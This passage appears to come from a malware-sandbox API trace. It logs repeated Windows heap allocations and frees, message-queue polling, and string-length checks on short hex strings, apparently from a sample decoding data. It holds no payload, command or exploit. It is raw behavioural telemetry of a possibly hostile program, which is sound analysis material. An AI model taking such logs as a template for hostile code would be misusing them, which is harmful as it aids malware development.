Size=0x10) returned 0x24a9000 [0145.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0145.291] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91b0 [0145.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0145.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91b0 | out: hHeap=0x25c0000) returned 1 [0145.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af7a0 [0145.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91b0 [0145.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91c8 [0145.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1178 [0145.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af9d0 [0145.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91e0 [0145.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10a8 [0145.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91e0 | out: hHeap=0x25c0000) returned 1 [0145.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af9a8 [0145.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91e0 [0145.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9108 [0145.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24af7a0 | out: hHeap=0x25c0000) returned 1 [0145.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0145.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91b0 | out: hHeap=0x25c0000) returned 1 [0145.292] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af7a0 [0145.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91b0 [0145.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0145.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9048 [0145.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1188 [0145.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1188 | out: hHeap=0x25c0000) returned 1 [0145.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1188 [0145.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0145.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9198 [0145.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11b8 [0145.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fb8 [0145.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11b8 | out: hHeap=0x25c0000) returned 1 [0145.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fb8 | out: hHeap=0x25c0000) returned 1 [0145.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9198 | out: hHeap=0x25c0000) returned 1 [0145.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0145.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1188 | out: hHeap=0x25c0000) returned 1 [0145.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1188 [0145.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1188 | out: hHeap=0x25c0000) returned 1 [0145.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d720 [0145.292] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1188 [0145.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0145.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9198 [0145.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11b8 [0145.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fb8 [0145.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9180 [0145.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11a8 [0145.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9078 [0145.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9228 [0145.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11c8 [0145.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9168 [0145.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9210 [0145.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11c8 [0145.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91f8 [0145.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11c8 [0145.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90c0 [0145.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b11c8 [0145.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9240 [0145.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9168 | out: hHeap=0x25c0000) returned 1 [0145.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9228 | out: hHeap=0x25c0000) returned 1 [0145.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9210 | out: hHeap=0x25c0000) returned 1 [0145.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91f8 | out: hHeap=0x25c0000) returned 1 [0145.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9078 | out: hHeap=0x25c0000) returned 1 [0145.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.294] lstrlenW (lpString="20") returned 2 [0145.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90c0 | out: hHeap=0x25c0000) returned 1 [0145.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9240 | out: hHeap=0x25c0000) returned 1 [0145.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9180 | out: hHeap=0x25c0000) returned 1 [0145.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fb8 | out: hHeap=0x25c0000) returned 1 [0145.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11b8 | out: hHeap=0x25c0000) returned 1 [0145.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fb8 [0145.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9180 [0145.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b11b8 [0145.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9198 | out: hHeap=0x25c0000) returned 1 [0145.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0145.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1188 | out: hHeap=0x25c0000) returned 1 [0145.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9180 | out: hHeap=0x25c0000) returned 1 [0145.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11b8 | out: hHeap=0x25c0000) returned 1 [0145.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fb8 | out: hHeap=0x25c0000) returned 1 [0145.294] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.294] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11b8 [0145.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fb8 [0145.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9180 [0145.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1188 [0145.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0145.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9198 [0145.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11c8 [0145.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9240 [0145.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90c0 [0145.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11a8 [0145.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9078 [0145.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91f8 [0145.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11a8 [0145.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9210 [0145.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11a8 [0145.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9228 [0145.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b11a8 [0145.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9168 [0145.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9078 | out: hHeap=0x25c0000) returned 1 [0145.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90c0 | out: hHeap=0x25c0000) returned 1 [0145.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91f8 | out: hHeap=0x25c0000) returned 1 [0145.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9210 | out: hHeap=0x25c0000) returned 1 [0145.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9240 | out: hHeap=0x25c0000) returned 1 [0145.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.295] lstrlenW (lpString="40") returned 2 [0145.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9228 | out: hHeap=0x25c0000) returned 1 [0145.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9168 | out: hHeap=0x25c0000) returned 1 [0145.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9198 | out: hHeap=0x25c0000) returned 1 [0145.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0145.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1188 | out: hHeap=0x25c0000) returned 1 [0145.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0145.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9198 [0145.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1188 [0145.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9180 | out: hHeap=0x25c0000) returned 1 [0145.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fb8 | out: hHeap=0x25c0000) returned 1 [0145.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11b8 | out: hHeap=0x25c0000) returned 1 [0145.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9198 | out: hHeap=0x25c0000) returned 1 [0145.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1188 | out: hHeap=0x25c0000) returned 1 [0145.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0145.296] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.296] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1188 [0145.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0145.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9198 [0145.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11b8 [0145.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fb8 [0145.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9180 [0145.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11a8 [0145.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9168 [0145.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9228 [0145.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11c8 [0145.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9240 [0145.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9210 [0145.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11c8 [0145.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91f8 [0145.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11c8 [0145.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90c0 [0145.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b11c8 [0145.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9078 [0145.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9240 | out: hHeap=0x25c0000) returned 1 [0145.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9228 | out: hHeap=0x25c0000) returned 1 [0145.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9210 | out: hHeap=0x25c0000) returned 1 [0145.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91f8 | out: hHeap=0x25c0000) returned 1 [0145.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9168 | out: hHeap=0x25c0000) returned 1 [0145.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.297] lstrlenW (lpString="43") returned 2 [0145.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90c0 | out: hHeap=0x25c0000) returned 1 [0145.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9078 | out: hHeap=0x25c0000) returned 1 [0145.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9180 | out: hHeap=0x25c0000) returned 1 [0145.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fb8 | out: hHeap=0x25c0000) returned 1 [0145.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11b8 | out: hHeap=0x25c0000) returned 1 [0145.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fb8 [0145.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9180 [0145.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b11b8 [0145.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9198 | out: hHeap=0x25c0000) returned 1 [0145.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0145.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1188 | out: hHeap=0x25c0000) returned 1 [0145.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9180 | out: hHeap=0x25c0000) returned 1 [0145.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11b8 | out: hHeap=0x25c0000) returned 1 [0145.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fb8 | out: hHeap=0x25c0000) returned 1 [0145.298] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.298] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11b8 [0145.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fb8 [0145.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9180 [0145.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1188 [0145.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0145.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9198 [0145.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11c8 [0145.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9078 [0145.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90c0 [0145.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11a8 [0145.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9168 [0145.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91f8 [0145.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11a8 [0145.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9210 [0145.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11a8 [0145.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9228 [0145.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b11a8 [0145.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9240 [0145.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9168 | out: hHeap=0x25c0000) returned 1 [0145.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90c0 | out: hHeap=0x25c0000) returned 1 [0145.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91f8 | out: hHeap=0x25c0000) returned 1 [0145.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9210 | out: hHeap=0x25c0000) returned 1 [0145.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9078 | out: hHeap=0x25c0000) returned 1 [0145.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.299] lstrlenW (lpString="6F") returned 2 [0145.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9228 | out: hHeap=0x25c0000) returned 1 [0145.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9240 | out: hHeap=0x25c0000) returned 1 [0145.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9198 | out: hHeap=0x25c0000) returned 1 [0145.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0145.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1188 | out: hHeap=0x25c0000) returned 1 [0145.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0145.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9198 [0145.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1188 [0145.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9180 | out: hHeap=0x25c0000) returned 1 [0145.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fb8 | out: hHeap=0x25c0000) returned 1 [0145.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11b8 | out: hHeap=0x25c0000) returned 1 [0145.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9198 | out: hHeap=0x25c0000) returned 1 [0145.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1188 | out: hHeap=0x25c0000) returned 1 [0145.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0145.299] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.300] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1188 [0145.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0145.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9198 [0145.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11b8 [0145.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fb8 [0145.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9180 [0145.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11a8 [0145.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9240 [0145.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9228 [0145.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11c8 [0145.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9078 [0145.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9210 [0145.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11c8 [0145.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91f8 [0145.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11c8 [0145.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 